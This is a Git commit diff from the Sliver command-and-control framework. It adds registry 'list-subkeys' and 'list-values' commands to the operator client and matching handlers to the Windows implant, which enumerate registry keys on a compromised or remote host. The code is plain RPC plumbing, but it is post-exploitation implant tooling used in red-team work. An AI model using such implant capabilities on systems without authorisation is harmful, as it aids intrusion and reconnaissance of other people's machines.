Add registry list-subkeys and list-values sub commands

BishopFox · Jul 29, 2021 · 394fdb4 · 394fdb4
1 parent 9d3b656
commit 394fdb4
Show file tree

Hide file tree

Showing 10 changed files with 1,490 additions and 846 deletions.
diff --git a/client/command/commands.go b/client/command/commands.go
@@ -1690,6 +1690,45 @@ func BindCommands(con *console.SliverConsoleClient) {
 			f.String("o", "hostname", "", "remote host to write values to")
 		},
 	})
+	registryCmd.AddCommand(&grumble.Command{
+		Name:     consts.RegistryListSubStr,
+		Help:     "List the sub keys under a registry key",
+		LongHelp: help.GetHelpFor([]string{consts.RegistryListSubStr}),
+		Args: func(a *grumble.Args) {
+			a.String("registry-path", "registry path")
+		},
+		Run: func(ctx *grumble.Context) error {
+			con.Println()
+			registry.RegListSubKeysCmd(ctx, con)
+			con.Println()
+			return nil
+		},
+		Flags: func(f *grumble.Flags) {
+			f.Int("t", "timeout", defaultTimeout, "command timeout in seconds")
+			f.String("H", "hive", "HKCU", "registry hive")
+			f.String("o", "hostname", "", "remote host to write values to")
+		},
+	})
+
+	registryCmd.AddCommand(&grumble.Command{
+		Name:     consts.RegistryListValuesStr,
+		Help:     "List the values for a registry key",
+		LongHelp: help.GetHelpFor([]string{consts.RegistryListValuesStr}),
+		Args: func(a *grumble.Args) {
+			a.String("registry-path", "registry path")
+		},
+		Run: func(ctx *grumble.Context) error {
+			con.Println()
+			registry.RegListValuesCmd(ctx, con)
+			con.Println()
+			return nil
+		},
+		Flags: func(f *grumble.Flags) {
+			f.Int("t", "timeout", defaultTimeout, "command timeout in seconds")
+			f.String("H", "hive", "HKCU", "registry hive")
+			f.String("o", "hostname", "", "remote host to write values to")
+		},
+	})
 	con.App.AddCommand(registryCmd)
 
 	// [ Pivots ] --------------------------------------------------------------

diff --git a/client/command/registry/reg-list.go b/client/command/registry/reg-list.go
@@ -0,0 +1,77 @@
+package registry
+
+import (
+	"context"
+
+	"github.com/bishopfox/sliver/client/console"
+	"github.com/bishopfox/sliver/protobuf/sliverpb"
+	"github.com/desertbit/grumble"
+)
+
+func RegListSubKeysCmd(ctx *grumble.Context, con *console.SliverConsoleClient) {
+	session := con.ActiveSession.GetInteractive()
+	if session == nil {
+		return
+	}
+
+	path := ctx.Args.String("registry-path")
+	hive := ctx.Flags.String("hive")
+	hostname := ctx.Flags.String("hostname")
+
+	regList, err := con.Rpc.RegistryListSubKeys(context.Background(), &sliverpb.RegistrySubKeyListReq{
+		Hive:     hive,
+		Hostname: hostname,
+		Path:     path,
+		Request:  con.ActiveSession.Request(ctx),
+	})
+
+	if err != nil {
+		con.PrintErrorf("Error: %s\n", err.Error())
+		return
+	}
+
+	if regList.Response != nil && regList.Response.Err != "" {
+		con.PrintErrorf("Error: %s\n", regList.Response.Err)
+		return
+	}
+	if len(regList.Subkeys) > 0 {
+		con.PrintInfof("Sub keys under %s:\\%s:\n", hive, path)
+	}
+	for _, subKey := range regList.Subkeys {
+		con.Println(subKey)
+	}
+}
+
+func RegListValuesCmd(ctx *grumble.Context, con *console.SliverConsoleClient) {
+	session := con.ActiveSession.GetInteractive()
+	if session == nil {
+		return
+	}
+
+	regPath := ctx.Args.String("registry-path")
+	hive := ctx.Flags.String("hive")
+	hostname := ctx.Flags.String("hostname")
+
+	regList, err := con.Rpc.RegistryListValues(context.Background(), &sliverpb.RegistryListValuesReq{
+		Hive:     hive,
+		Hostname: hostname,
+		Path:     regPath,
+		Request:  con.ActiveSession.Request(ctx),
+	})
+
+	if err != nil {
+		con.PrintErrorf("Error: %s\n", err.Error())
+		return
+	}
+
+	if regList.Response != nil && regList.Response.Err != "" {
+		con.PrintErrorf("Error: %s\n", regList.Response.Err)
+		return
+	}
+	if len(regList.ValueNames) > 0 {
+		con.PrintInfof("Values under %s:\\%s:\n", hive, regPath)
+	}
+	for _, val := range regList.ValueNames {
+		con.Println(val)
+	}
+}
diff --git a/implant/sliver/handlers/handlers_windows.go b/implant/sliver/handlers/handlers_windows.go
@@ -64,16 +64,18 @@ var (
 		sliverpb.MsgGetPrivsReq:              getPrivsHandler,
 
 		// Platform specific
-		sliverpb.MsgIfconfigReq:          ifconfigHandler,
-		sliverpb.MsgScreenshotReq:        screenshotHandler,
-		sliverpb.MsgSideloadReq:          sideloadHandler,
-		sliverpb.MsgNetstatReq:           netstatHandler,
-		sliverpb.MsgMakeTokenReq:         makeTokenHandler,
-		sliverpb.MsgPsReq:                psHandler,
-		sliverpb.MsgTerminateReq:         terminateHandler,
-		sliverpb.MsgRegistryReadReq:      regReadHandler,
-		sliverpb.MsgRegistryWriteReq:     regWriteHandler,
-		sliverpb.MsgRegistryCreateKeyReq: regCreateKeyHandler,
+		sliverpb.MsgIfconfigReq:            ifconfigHandler,
+		sliverpb.MsgScreenshotReq:          screenshotHandler,
+		sliverpb.MsgSideloadReq:            sideloadHandler,
+		sliverpb.MsgNetstatReq:             netstatHandler,
+		sliverpb.MsgMakeTokenReq:           makeTokenHandler,
+		sliverpb.MsgPsReq:                  psHandler,
+		sliverpb.MsgTerminateReq:           terminateHandler,
+		sliverpb.MsgRegistryReadReq:        regReadHandler,
+		sliverpb.MsgRegistryWriteReq:       regWriteHandler,
+		sliverpb.MsgRegistryCreateKeyReq:   regCreateKeyHandler,
+		sliverpb.MsgRegistrySubKeysListReq: regSubKeysListHandler,
+		sliverpb.MsgRegistryListValuesReq:  regValuesListHandler,
 
 		// Generic
 		sliverpb.MsgPing:                 pingHandler,
@@ -495,6 +497,44 @@ func regCreateKeyHandler(data []byte, resp RPCResponse) {
 	resp(data, err)
 }
 
+func regSubKeysListHandler(data []byte, resp RPCResponse) {
+	listReq := &sliverpb.RegistrySubKeyListReq{}
+	err := proto.Unmarshal(data, listReq)
+	if err != nil {
+		return
+	}
+	subKeys, err := registry.ListSubKeys(listReq.Hostname, listReq.Hive, listReq.Path)
+	regListResp := &sliverpb.RegistrySubKeyList{
+		Response: &commonpb.Response{},
+	}
+	if err != nil {
+		regListResp.Response.Err = err.Error()
+	} else {
+		regListResp.Subkeys = subKeys
+	}
+	data, err = proto.Marshal(regListResp)
+	resp(data, err)
+}
+
+func regValuesListHandler(data []byte, resp RPCResponse) {
+	listReq := &sliverpb.RegistryListValuesReq{}
+	err := proto.Unmarshal(data, listReq)
+	if err != nil {
+		return
+	}
+	regValues, err := registry.ListValues(listReq.Hostname, listReq.Hive, listReq.Path)
+	regListResp := &sliverpb.RegistryValuesList{
+		Response: &commonpb.Response{},
+	}
+	if err != nil {
+		regListResp.Response.Err = err.Error()
+	} else {
+		regListResp.ValueNames = regValues
+	}
+	data, err = proto.Marshal(regListResp)
+	resp(data, err)
+}
+
 func getPrivsHandler(data []byte, resp RPCResponse) {
 	createReq := &sliverpb.GetPrivsReq{}